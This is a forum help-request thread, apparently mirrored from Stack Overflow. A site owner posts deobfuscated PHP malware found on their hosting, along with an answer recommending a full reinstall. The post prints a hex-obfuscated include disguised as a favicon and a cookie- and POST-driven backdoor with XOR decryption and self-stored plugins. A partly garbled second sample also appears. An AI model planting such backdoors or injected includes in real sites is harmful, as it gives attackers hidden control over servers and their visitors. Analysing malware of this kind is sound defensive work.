dongmaobeng7145 2017-04-04 15:42
浏览 126

我的网站感染了混淆的PHP恶意软件 - 它在做什么+如何摆脱它?

I have three websites all hosted on the same webserver. Recently I was working on one of the websites and noticed that, about a month ago, a bunch of files had been changed. Specifically, all instances of index.html had been renamed to index.html.bak.bak, and index.php files have been put in their places. The index.php files are relatively simple; they include a file hidden somewhere in each website's filesystem (seemingly a random folder) that's been obfuscated with JS hex encoding, then echo the original index.html:


@include "\x2fm\x6et\x2fs\x74o\x721\x2dw\x631\x2dd\x66w\x31/\x338\x304\x323\x2f4\x365\x380\x39/\x77w\x77.\x77e\x62s\x69t\x65.\x63o\x6d/\x77e\x62/\x63o\x6et\x65n\x74/\x77p\x2di\x6ec\x6cu\x64e\x73/\x6as\x2fs\x77f\x75p\x6co\x61d\x2ff\x61v\x69c\x6fn\x5f2\x391\x337\x32.\x69c\x6f";


echo file_get_contents('index.html.bak.bak');

The included file here was


On another domain, it was


As you could probably guess, these aren't actually favicons - they're just php files with a different extension. Now, I have no clue what these files do (which is why I'm asking here). They were totally obfuscated, but seems to be able to crack through it. The results can be found here, but I've pasted the de-obfuscated code below:

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);

    define("PHP_EOL", "

    define("DIRECTORY_SEPARATOR", "/");

if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
    define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);

    $data = NULL;
    $data_key = NULL;

    $GLOBALS['cs_auth'] = '8debdf89-dfb8-4968-8667-04713f279109';
    global $cs_auth;

    if (!function_exists('file_put_contents'))
        function file_put_contents($n, $d, $flag = False)
            $mode = $flag == 8 ? 'a' : 'w';
            $f = @fopen($n, $mode);
            if ($f === False)
                return 0;
                if (is_array($d)) $d = implode($d);
                $bytes_written = fwrite($f, $d);
                return $bytes_written;

    if (!function_exists('file_get_contents'))
        function file_get_contents($filename)
            $fhandle = fopen($filename, "r");
            $fcontents = fread($fhandle, filesize($filename));

            return $fcontents;
    function cs_get_current_filepath()
        return trim(preg_replace("/\(.*\$/", '', __FILE__));

    function cs_decrypt_phase($data, $key)
        $out_data = "";

        for ($i=0; $i<strlen($data);)
            for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
                $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));

        return $out_data;

    function cs_decrypt($data, $key)
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
    function cs_encrypt($data, $key)
        global $cs_auth;

        return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);

    function cs_get_plugin_config()
        $self_content = @file_get_contents(cs_get_current_filepath());

        $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
        if ($config_pos !== FALSE)
            $config = substr($self_content, $config_pos + 32);
            $plugins = @unserialize(cs_decrypt(base64_decode($config), md5(cs_get_current_filepath())));
            $plugins = Array();

        return $plugins;

    function cs_set_plugin_config($plugins)
        $config_enc = base64_encode(cs_encrypt(@serialize($plugins), md5(cs_get_current_filepath())));
        $self_content = @file_get_contents(cs_get_current_filepath());

        $config_pos = strpos($self_content, md5(cs_get_current_filepath()));
        if ($config_pos !== FALSE)
            $config_old = substr($self_content, $config_pos + 32);
            $self_content = str_replace($config_old, $config_enc, $self_content);

            $self_content = $self_content . "

//" . md5(cs_get_current_filepath()) . $config_enc;

        @file_put_contents(cs_get_current_filepath(), $self_content);

    function cs_plugin_add($name, $base64_data)
        $plugins = cs_get_plugin_config();

        $plugins[$name] = base64_decode($base64_data);


    function cs_plugin_rem($name)
        $plugins = cs_get_plugin_config();



    function cs_plugin_load($name=NULL)
        foreach (cs_get_plugin_config() as $pname=>$pcontent)
            if ($name)
                if (strcmp($name, $pname) == 0)

    foreach ($_COOKIE as $key=>$value)
        $data = $value;
        $data_key = $key;

    if (!$data)
        foreach ($_POST as $key=>$value)
            $data = $value;
            $data_key = $key;

    $data = @unserialize(cs_decrypt(base64_decode($data), $data_key));

    if (isset($data['ak']) && $cs_auth==$data['ak'])
        if ($data['a'] == 'i')
            $i = Array(
                'pv' => @phpversion(),
                'sv' => '2.0-1',
                'ak' => $data['ak'],
            echo @serialize($i);
        elseif ($data['a'] == 'e')
        elseif ($data['a'] == 'plugin')
            if($data['sa'] == 'add')
                cs_plugin_add($data['p'], $data['d']);
            elseif($data['sa'] == 'rem')
        echo $data['ak'];



In addition, there is a file called init5.php in one of the website's content folders, which after deobfuscating as much as possible, becomes:

$GLOBALS['893\Gt3$3'] = $_POST;
$GLOBALS['S9]<\<\$'] = $_COOKIE;
@>P>r"$,('$66N6rTNj', NULL);
@>P>r"$,('TNjr$66N6"', 0);
@>P>r"$,('k3'r$'$9#,>NPr,>k$', 0);
$w6f96424 = NULL;
$s02c4f38 = NULL;
global $y10a790;
function a31f0($w6f96424, $afb8d)
    $p98c0e = "";

    for ($r035e7=0; $r035e7<",6T$P($w6f96424);)
        for ($l545=0; $l545<",6T$P($afb8d) && $r035e7<",6T$P($w6f96424); $l545++, $r035e7++)
            $p98c0e .= 9)6(N6`($w6f96424[$r035e7]) ^ N6`($afb8d[$l545]));

    return $p98c0e;

function la30956($w6f96424, $afb8d)
    global $y10a790;

    return 3\x9<(3\x9<($w6f96424, $y10a790), $afb8d);

foreach ($GLOBALS['S9]<\<\$'] as $afb8d=>$ua56c9d)
    $w6f96424 = $ua56c9d;
    $s02c4f38 = $afb8d;

if (!$w6f96424)
    foreach ($GLOBALS['893\Gt3$3'] as $afb8d=>$ua56c9d)
        $w6f96424 = $ua56c9d;
        $s02c4f38 = $afb8d;

$w6f96424 = @#P"$6>3T>a$(T3\<]tO(R3"$OIr`$9N`$($w6f96424), $s02c4f38));
if (isset($w6f96424['38']) && $y10a790==$w6f96424['38'])
    if ($w6f96424['3'] == '>')
        $r035e7 = Array(
            '@=' => @@)@=$6">NP(),
            '"=' => 'x%<Fx',
        echo @"$6>3T>a$($r035e7);
    elseif ($w6f96424['3'] == '$')


There are more obfuscated PHP files the more I look, which is kinda scary. There's tons of them. Even Wordpress' index.php files seem to have been infected; the obfuscated @includes have been added to them. In addition, on one of the websites, there's a file titled 'ssh' that seems to be some kind of binary file (maybe the 'ssh' program itself?)

Does anyone know what these are or do? How did they get on my server? How can I get rid of them and make sure they never comes back?

Some other info: my webhost is Laughing Squid; I have no shell access. The server runs Linux, Apache 2.4, and PHP 5.6.29. Thank you!

  • 写回答

6条回答 默认 最新

  • doujiao7483 2018-10-15 18:10

    You can't trust anything on the server at this point.

    • Reinstall the OS

    • Reinstall known good copies of your code with a clean or known-good version of the database.

    At this point there's no use in just replacing/deleting "bad" files because the attacker could have done absolutely anything ranging from "nothing" to replacing system level software with hacked versions that will do anything desired. Just for an example, at one point someone wrote malware into a compiler so even if the executable was rebuilt, the maware was still there, also it prevented the debugger from detecting it.

    There are various cleaners available, but they rely on knowing/detecting/undoing everything the attacker might have done, which is impossible.

    If you had good daily backups, you could do a diff between the "what you have" and "what you had before" and see what has changed, however you would still need to carefully examine or restore your database since many attacks involve changing data, not code.

    本回答被题主选为最佳回答 , 对您是否有帮助呢?



  • ¥188 寻找能做王者评分提取的
  • ¥15 matlab用simulink求解一个二阶微分方程,要求截图
  • ¥30 乘子法解约束最优化问题的matlab代码文件,最好有matlab代码文件
  • ¥15 写论文,需要数据支撑
  • ¥15 identifier of an instance of 类 was altered from xx to xx错误
  • ¥100 反编译微信小游戏求指导
  • ¥15 docker模式webrtc-streamer 无法播放公网rtsp
  • ¥15 学不会递归,理解不了汉诺塔参数变化
  • ¥15 基于图神经网络的COVID-19药物筛选研究
  • ¥30 软件自定义无线电该怎样使用